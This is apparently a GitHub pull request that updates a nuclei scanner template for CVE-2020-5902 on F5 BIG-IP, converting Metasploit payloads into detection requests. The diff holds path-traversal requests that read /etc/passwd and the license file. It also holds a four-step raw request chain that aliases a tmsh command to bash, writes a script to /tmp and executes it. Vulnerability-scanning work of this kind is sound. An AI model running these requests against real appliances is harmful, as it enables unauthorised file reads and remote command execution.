### PR TITLE
Update CVE-2020-5902 matchers & requests

### DIFF
--- a/cves/CVE-2020-5902.yaml
+++ b/cves/CVE-2020-5902.yaml
@@ -2,13 +2,16 @@ id: CVE-2020-5902
 
 info:
   name: F5 BIG-IP TMUI RCE
-  author: madrobot
+  author: madrobot & dwisiswant0
   severity: high
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
+      - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
+      - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
+    matchers-condition: and
     matchers:
       - type: status
         status:
@@ -16,4 +19,44 @@ requests:
       - type: regex
         regex:
           - "root:[x*]:0:0:"
+          - "BIG-IP release ([\\d.]+)"
+          - "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
+        condition: or
         part: body
+  - raw:
+    - |
+      POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
+      Host: {{Hostname}}
+      Connection: close
+      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+      command={{url_encode("create cli alias private list command bash")}}
+    - |
+      POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
+      Host: {{Hostname}}
+      Connection: close
+      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+      fileName={{url_encode("/tmp/nonexistent")}}&content={{url_encode("echo 'aDNsbDBfdzBSbGQK' | base64 -d")}}
+    - |
+      POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
+      Host: {{Hostname}}
+      Connection: close
+      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+      command={{url_encode("list /tmp/nonexistent")}}
+    - |
+      POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
+      Host: {{Hostname}}
+      Connection: close
+      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+      command={{url_encode("delete cli alias private list")}}
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "h3ll0_w0Rld"

--- a/cves/CVE-2020-5902.yaml
+++ b/cves/CVE-2020-5902.yaml
@@ -24,34 +24,34 @@ requests:
         condition: or
         part: body
   - raw:
-    - |
-      POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
-      Host: {{Hostname}}
-      Connection: close
-      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+      - |
+        POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
-      command={{url_encode("create cli alias private list command bash")}}
-    - |
-      POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
-      Host: {{Hostname}}
-      Connection: close
-      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        command={{url_encode("create cli alias private list command bash")}}
+      - |
+        POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
-      fileName={{url_encode("/tmp/nonexistent")}}&content={{url_encode("echo 'aDNsbDBfdzBSbGQK' | base64 -d")}}
-    - |
-      POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
-      Host: {{Hostname}}
-      Connection: close
-      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        fileName={{url_encode("/tmp/nonexistent")}}&content={{url_encode("echo 'aDNsbDBfdzBSbGQK' | base64 -d")}}
+      - |
+        POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
-      command={{url_encode("list /tmp/nonexistent")}}
-    - |
-      POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
-      Host: {{Hostname}}
-      Connection: close
-      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        command={{url_encode("list /tmp/nonexistent")}}
+      - |
+        POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
-      command={{url_encode("delete cli alias private list")}}
+        command={{url_encode("delete cli alias private list")}}
     matchers-condition: and
     matchers:
       - type: status


### PR DESCRIPTION
### Motivation & Context

Converting rapid7/metasploit-framework#13807 payloads to nuclei-template.

### Proposed of Changes

- Add new file read requests _(based on https://support.f5.com/csp/article/K26582310 & https://support.f5.com/csp/article/K7752)_
- Add `matchers-condition`
- Add RAW requests

### Screenshots

![Screenshot_2020-07-06_18-10-34](https://user-images.githubusercontent.com/25837540/86588380-cc8d0080-bfb5-11ea-8bc5-02b9ea93cdf0.png)
